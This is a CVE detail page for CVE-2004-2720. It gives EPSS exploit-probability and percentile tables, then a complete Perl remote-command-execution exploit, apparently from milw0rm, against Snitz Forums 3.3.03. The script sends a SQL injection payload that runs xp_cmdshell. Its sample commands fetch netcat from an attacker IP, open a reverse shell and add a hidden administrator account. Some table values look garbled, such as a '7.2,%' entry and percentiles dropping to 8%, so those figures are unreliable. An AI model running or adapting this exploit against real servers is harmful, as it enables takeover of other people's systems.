CVE-2004-2720 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.89%	–	–
2022-04-03	–	–	4.89%	–	–
2022-05-15	–	–	4.89%	–	–
2023-03-12	–	–	–	0.41%	–
2023-04-16	–	–	–	0.35%	–
2023-05-28	–	–	–	0.35%	–
2023-10-29	–	–	–	0.35%	–
2023-12-03	–	–	–	0.35%	–
2023-12-10	–	–	–	0.35%	–
2024-02-04	–	–	–	0.4%	–
2024-02-11	–	–	–	0.4%	–
2024-06-02	–	–	–	0.39%	–
2024-07-07	–	–	–	0.65%	–
2024-07-14	–	–	–	0.65%	–
2024-08-04	–	–	–	0.65%	–
2024-08-11	–	–	–	0.69%	–
2024-09-01	–	–	–	0.69%	–
2024-09-22	–	–	–	0.62%	–
2024-12-15	–	–	–	0.62%	–
2024-12-22	–	–	–	0.74%	–
2025-01-12	–	–	–	0.61%	–
2025-01-19	–	–	–	0.61%	–
2025-03-18	–	–	–	–	7.2%
2025-03-18	–	–	–	–	7.2,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	75%
2022-04-03	88%
2022-05-15	89%
2023-03-12	7%
2023-04-16	67%
2023-05-28	68%
2023-10-29	69%
2023-12-03	68%
2023-12-10	69%
2024-02-04	71%
2024-02-11	73%
2024-06-02	73%
2024-07-07	79%
2024-07-14	8%
2024-08-04	79%
2024-08-11	8%
2024-09-01	81%
2024-09-22	79%
2024-12-15	8%
2024-12-22	81%
2025-01-12	79%
2025-01-19	79%
2025-03-18	91%
2025-03-18	91%

#!/usr/bin/perl use Socket; print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n"; print "You accept full responsibility for your actions by using this script.\n"; print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n"; print "\nWeb server? [www.enterthegame.com]: "; my $webserver = <STDIN>; chomp $webserver; if( $webserver eq "" ) { $webserver = "www.enterthegame.com"; } print "\nWeb server port? [80]: "; my $port = <STDIN>; chomp $port; if( $port eq "" ) { $port = 80; } print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: "; my $path = <STDIN>; chomp $path; if( $path eq "" ) { $path = "/forum/register.asp"; } print "\nCommand to execute non-interactively\n"; print " Example commands: tftp -i Your.IP.Here GET nc.exe\n"; print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n"; print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n"; print "Your command: "; my $command = <STDIN>; chomp $command; $command =~ s/\ /\%20/g; if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef ) { print "Error connecting to $webserver\n"; exit( 0 ); } else { my $data1 = $path . "\?mode\=DoIt"; my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz"; my $length = length( $data2 ); print FILEHANDLE "POST $data1 HTTP/1.1\n"; if( $port == 80 ) { print FILEHANDLE "Host: $webserver\n"; } else { print FILEHANDLE "Host: $webserver:$port\n"; } print FILEHANDLE "Accept: */*\n"; print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"; print FILEHANDLE "Keep-Alive: 300\n"; print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n"; print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n"; print FILEHANDLE "Content-Length: $length\n\n"; print FILEHANDLE "$data2"; print "\nSQL injection command sent. If you are waiting for a shell on your listening\n"; print "netcat, hit \"enter\" a couple of times to be safe.\n\n"; close( FILEHANDLE ); } sub open_TCP { my( $FS, $dest, $port ) = @_; my $proto = getprotobyname( 'tcp' ); socket( $FS, PF_INET, SOCK_STREAM, $proto ); my $sin = sockaddr_in( $port, inet_aton( $dest )); connect( $FS, $sin ) || return undef; my $old_fh = select( $FS ); $| = 1; select( $old_fh ); return 1; } # milw0rm.com [2003-05-12]